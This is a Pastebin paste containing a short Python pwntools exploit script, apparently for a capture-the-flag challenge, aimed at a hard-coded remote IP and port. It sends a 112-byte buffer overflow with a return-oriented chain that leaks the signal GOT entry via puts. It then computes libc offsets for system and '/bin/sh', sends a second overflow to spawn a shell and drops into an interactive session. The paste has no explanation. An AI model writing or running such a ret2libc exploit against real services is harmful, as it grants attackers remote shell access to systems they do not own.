Advertisement
Guest User

Untitled

a guest
Jun 24th, 2018
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.46 KB | None | 0 0
  1. from pwn import *
  2. import time
  3. r=remote("212.237.56.32",33334)
  4. time.sleep(1)
  5. r.recv()
  6. #0x08048430 <---- Return to puts
  7. #0x08048470 <---- return point
  8. #0x0804A014 <---- signal@got
  9. r.sendline("a"*112+p32(0x08048430)+p32(0x08048470)+p32(0x0804A014))
  10. time.sleep(1)
  11. signal=u32(r.recv(4))
  12. system=signal+  0xef80
  13. binsh=signal+   0x12fbeb
  14. log.success("SSIGNAL LEAKED: "+hex(signal))
  15. r.sendline("a"*112+p32(system)+p32(0x08048470)+p32(binsh))
  16.  
  17. r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement